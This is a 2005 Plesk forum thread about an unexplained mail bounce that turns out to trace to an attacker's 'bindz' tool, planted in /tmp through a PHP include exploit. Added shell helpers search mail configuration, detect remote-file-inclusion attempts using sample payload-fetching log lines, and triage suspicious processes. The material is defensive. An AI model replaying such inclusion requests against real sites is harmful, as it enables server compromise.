
Strange mail behavior

Discussion in 'Plesk for Linux - 8.x and Older' started by NightMan, Jul 7, 2005.

  1. NightMan

    NightMan Guest

     
    I am testing a PHP script which sends a mail to myself, but when I tried today it sent the mail to me and sent a bounce as well. The bounce was generated for an unknown mail ID. How can this happen?

    I have checked the PSA database and searched for the mail ID in all tables, but found none.

    Which file on the server includes aliases or group mail options?

    SERVER : LINUX RHE/PSA 7.5.x
     
  2. jamesyeeoc

    jamesyeeoc Guest

     
    For aliases, check:

    /etc/aliases

    /etc/mail/aliases

    Not sure about group mail
     
  3. NightMan

    NightMan Guest

     
    These files or folders do not exist.
     
  4. jamesyeeoc

    jamesyeeoc Guest

     
    Ok, check for these:

    /var/qmail/alias
    /var/qmail/alias/.qmail-mailer-daemon
    /var/qmail/alias/.qmail-postmaster
    /var/qmail/alias/.qmail-root

    (or similar named)
     
  5. jamesyeeoc

    jamesyeeoc Guest

     
    ****, I gotta stop doing simultaneous checking/posting to so many support boards (doing 4 sites right now). Hard to keep things straight on no sleep and so many forum posts. Sorry.

    Plesk also has the following:
    mySQL database: psa, table: mail_aliases
     
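A shell helper, added here and not part of the thread, that searches the qmail alias files listed in the two replies above together with the other on-disk places a qmail/Plesk server keeps delivery instructions for an address, and asks the same question of the psa database. QMAIL_ROOT, the mailnames/ layout and the admin password in /etc/psa/.psa.shadow are assumptions about a stock Plesk 7.x install; the sample tree is constructed so the search can be tried offline.

```shell
#!/bin/sh
# Added example, not code from the thread. Searches the on-disk places a
# qmail/Plesk server keeps delivery instructions for an address. Paths are
# assumed stock locations; override QMAIL_ROOT to run against a test tree.
QMAIL_ROOT="${QMAIL_ROOT:-/var/qmail}"

# Print every file under the qmail tree that mentions $1. Covered (assumed
# layout): alias/.qmail-*, control/virtualdomains, users/assign, and the
# per-mailbox .qmail files Plesk writes under mailnames/<domain>/<box>/.
find_address_refs() {
    addr="$1"
    for d in "$QMAIL_ROOT/alias" "$QMAIL_ROOT/control" \
             "$QMAIL_ROOT/users"  "$QMAIL_ROOT/mailnames"; do
        [ -d "$d" ] || continue
        # -r descends into dotfiles too; "|| true" keeps a no-match grep from
        # aborting the loop when the caller runs under set -e.
        grep -rlF -- "$addr" "$d" 2>/dev/null || true
    done
}

# Same question asked of the Plesk database table named in the thread.
# Assumed: admin password readable from /etc/psa/.psa.shadow as on Plesk 7.x.
find_address_in_psa() {
    mysql -uadmin -p"$(cat /etc/psa/.psa.shadow)" psa \
        -e 'SELECT * FROM mail_aliases' 2>/dev/null |
        grep -F -- "$1"
}

# Build a small constructed qmail tree under $1 for trying the search offline.
build_sample_tree() {
    root="$1"
    mkdir -p "$root/alias" "$root/control" "$root/mailnames/example.com/info"
    printf '&postmaster@example.com\n' > "$root/alias/.qmail-mailer-daemon"
    printf '&root@example.com\n'       > "$root/alias/.qmail-postmaster"
    printf 'example.com:example.com\n' > "$root/control/virtualdomains"
    printf '&spamtrap@example.net\n'   > "$root/mailnames/example.com/info/.qmail"
}

# Live usage (the address from the bounce in this thread):
#   find_address_refs DonnebowlsT@softhome.net
#   find_address_in_psa DonnebowlsT@softhome.net
```

If neither function prints anything, the address was never a configured alias or forward on the box, which is the situation the original poster ends up in: the next place to look is the process list and the scratch directories, not the mail configuration.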
  6. NightMan

    NightMan Guest

     
    :) Thanks, but the bounced mail ID is not in any of these files. Just wondering... any suggestions?
     
  7. jamesyeeoc

    jamesyeeoc Guest

     
    I cross posted, please see my post (above) regarding mySQL database

    What is the bounced mail ID name?

    And have you checked the contents of the php.ini file?
     
  8. NightMan

    NightMan Guest

     
    Hi. This is the qmail-send program at myserver.com.
    I'm afraid I wasn't able to deliver your message to the following addresses.
    This is a permanent error; I've given up. Sorry it didn't work out.

    <DonnebowlsT@softhome.net>:
    66.54.152.4 does not like recipient.
    Remote host said: 550 passing these spams on just makes it worse
    Giving up on 66.54.152.4.

    --- Below this line is a copy of the message.

    I already checked the PSA database; the mail ID is not in that table or any other table.

    php.ini does not mention the mail ID anywhere.
     
  9. jamesyeeoc

    jamesyeeoc Guest

     
    Just trying to get a better feel for things:

    Q1: Have you *ever* dealt with softhome.net on this server? Or is that your domain?? (I figure it's not yours)

    Q2: Is that your IP? (I figure it's not yours)

    Q3: If it's your domain or IP, what software do you have which might generate that 550 message? (probably not your box)

    Q4: Have you run rootkit scans lately (with latest updates for RKHunter and Chkrootkit)

    Q5: Have you checked /tmp and /var/tmp for any funny files (exploited script)?

    I know these are standard questions, but it is possible you may have been breached coincidentally at the same time.
     
  10. NightMan

    NightMan Guest

     
    Q1: Have you *ever* dealt with softhome.net on this server? Or is that your domain?? (I figure it's not yours)
    #No, never
    Q2: Is that your IP? (I figure it's not yours)
    #NOT mine
    Q3: If it's your domain or IP, what software do you have which might generate that 550 message? (probably not your box)
    #not from my box
    Q4: Have you run rootkit scans lately (with latest updates for RKHunter and Chkrootkit)
    #yes, no issues found..
    Q5: Have you checked /tmp and /var/tmp for any funny files (exploited script)?
    # I found a file called bindz in the /tmp folder and removed it, checked for any exploits, but was not able to find any other tracks.
    The compiler was already disabled. The file had been downloaded using a PHP include exploit.
     
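The "PHP include exploit" named in the reply above is what is now called remote file inclusion: a script passes a request parameter to include(), and with allow_url_fopen on (the default in PHP 4 and 5) the attacker supplies a URL, so PHP fetches and runs a file from a host they control. The block below is an added example, not from the thread; it runs a detector over constructed Apache combined-format log lines and extracts the hosts the payloads were fetched from, which is where a responder would look next. The Plesk per-vhost log path in the usage comment is an assumption about the 7.x layout.

```shell
#!/bin/sh
# Added example, not from the thread: spot remote-file-inclusion attempts in
# Apache combined-format access logs. The log lines below are constructed.
SAMPLE_LOG='203.0.113.5 - - [07/Jul/2005:03:12:44 +0000] "GET /index.php?page=http://198.51.100.9/bindz.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [07/Jul/2005:03:12:50 +0000] "GET /index.php?page=http%3A%2F%2F198.51.100.9%2Fbindz.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.7 - - [07/Jul/2005:03:13:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
192.0.2.8 - - [07/Jul/2005:03:14:10 +0000] "GET /contact.php HTTP/1.1" 200 1024 "http://example.com/" "Mozilla/4.0"'

# Pass through log lines whose request line carries a query parameter whose
# value is an absolute URL, plain or percent-encoded. Only the request field
# is examined, so a URL in the Referer field does not trigger a hit.
rfi_hits() {
    grep -i -E '"(GET|POST) [^ ]*\?[^ ]*=(https?|ftp)(://|%3a%2f%2f)'
}

# Decode the two escapes that matter, then pull out scheme://host of each
# payload URL: the server the attacker's tool was fetched from.
rfi_sources() {
    rfi_hits |
        sed -e 's/%3[aA]/:/g' -e 's|%2[fF]|/|g' |
        grep -o -i -E '=(https?|ftp)://[^/ "?&]+' |
        sed 's/^=//' |
        sort -u
}

# Number of RFI-looking requests on stdin (a quick daily check).
rfi_count() {
    rfi_hits | wc -l | tr -d ' '
}

# Live usage (Plesk 7.x per-vhost log location assumed):
#   rfi_sources < /var/log/httpd/access_log
#   cat /home/httpd/vhosts/*/statistics/logs/access_log | rfi_sources
```

The first two sample lines are the same request with and without percent-encoding; both must be caught, because a detector that only looks for a literal "http://" misses the encoded form. The fix on the application side is to never pass request input to include(); the server-side mitigation for a shared host is allow_url_fopen = Off in php.ini, which blocks the fetch even when the script is broken.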
  11. jamesyeeoc

    jamesyeeoc Guest

     
    The filename 'bindz' might indicate a Bind/named redirector of some sort (grasping at air).

    After deleting the file, have you also checked the process list (ps -ax) to see if there are any funny processes running currently?
     
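The two checks asked about in the thread (funny files in /tmp and /var/tmp, funny processes in ps -ax), as an added shell example that is not from the thread: executable files in the scratch directories, and processes whose binary lives in one of them or has been unlinked from disk, which is how a tool like the bindz found in /tmp shows up when an attacker removes it after starting it. PROC_ROOT and the directory list are parameters so the checks can be exercised against a constructed tree; the Linux /proc/<pid>/exe convention is assumed.

```shell
#!/bin/sh
# Added example, not from the thread. Two triage checks for a box suspected of
# running an attacker's dropped tool. PROC_ROOT is a parameter so the process
# check can be exercised against a constructed /proc look-alike.
PROC_ROOT="${PROC_ROOT:-/proc}"

# List regular files with any execute bit set under the given directories.
# Dropped tools are normally chmod +x'd before they are launched, so an
# executable upload ranks above a plain data file.
suspicious_tmp_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f \( -perm -u+x -o -perm -g+x -o -perm -o+x \) 2>/dev/null
    done
}

# Print "pid exe" for each process whose executable path is under one of the
# given directories, or whose executable has been unlinked since it started
# (Linux reports the link target with a " (deleted)" suffix). A running
# binary with no file on disk survives "rm" and is a classic post-cleanup find.
procs_from_dirs() {
    for p in "$PROC_ROOT"/[0-9]*; do
        [ -d "$p" ] || continue
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # kernel threads, no perms
        pid=${p##*/}
        case "$exe" in
            *' (deleted)') echo "$pid $exe"; continue ;;
        esac
        for d in "$@"; do
            case "$exe" in
                "$d"/*) echo "$pid $exe"; break ;;
            esac
        done
    done
}

# Build a constructed /proc look-alike plus a scratch dir under $1 to try
# both checks offline (three fake pids: one in /tmp, one normal, one deleted).
build_sample_tree() {
    root="$1"
    mkdir -p "$root/proc/100" "$root/proc/200" "$root/proc/300" "$root/tmp"
    ln -s /tmp/bindz             "$root/proc/100/exe"
    ln -s /usr/sbin/httpd        "$root/proc/200/exe"
    ln -s '/var/tmp/x (deleted)' "$root/proc/300/exe"
    : > "$root/tmp/bindz";       chmod 755 "$root/tmp/bindz"
    : > "$root/tmp/.hidden";     chmod 700 "$root/tmp/.hidden"
    : > "$root/tmp/sess_abc";    chmod 600 "$root/tmp/sess_abc"
}

# Live usage:
#   suspicious_tmp_files /tmp /var/tmp /dev/shm
#   procs_from_dirs /tmp /var/tmp /dev/shm
```

Run the process check before deleting anything: once the file is gone, the "(deleted)" suffix on /proc/<pid>/exe is the only remaining pointer to which process was running it, and /proc/<pid>/exe can still be copied out for analysis while the process lives. Killing the process first, as happened in this thread, loses that copy.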
  12. NightMan

    NightMan Guest

     
    Yes, I did find that bindz was running, so I killed it.
    The mail had also been received before I got it removed.
     
  13. jamesyeeoc

    jamesyeeoc Guest

     
    Just PM'd you this:

    Other forums have reported same file found, script kiddie started out by exploiting exim systems.

    http://www.webhostingtalk.com/archive/thread/407726-1.html
    http://www.webhostingtalk.com/archive/thread/394689-1.html
    http://lists.indymedia.org/pipermail/imc-tech/2005-May/0503-d1.html
    http://forum.ev1servers.net/showthread.php?t=54849

    One of these threads makes reference to additional files to check for. I just skimmed them (too tired to focus eyes), good luck in getting it cleaned up. (love your signature line)
     
  14. NightMan

    NightMan Guest

     
    Yes, got your PM. Thanks for the links. I already checked Google, but was not able to find any useful info.
     
  15. jamesyeeoc

    jamesyeeoc Guest

     
    I found those by googling "bindz +script"

    Sun come up, eyelids go down. Nighty night, Nightman....
     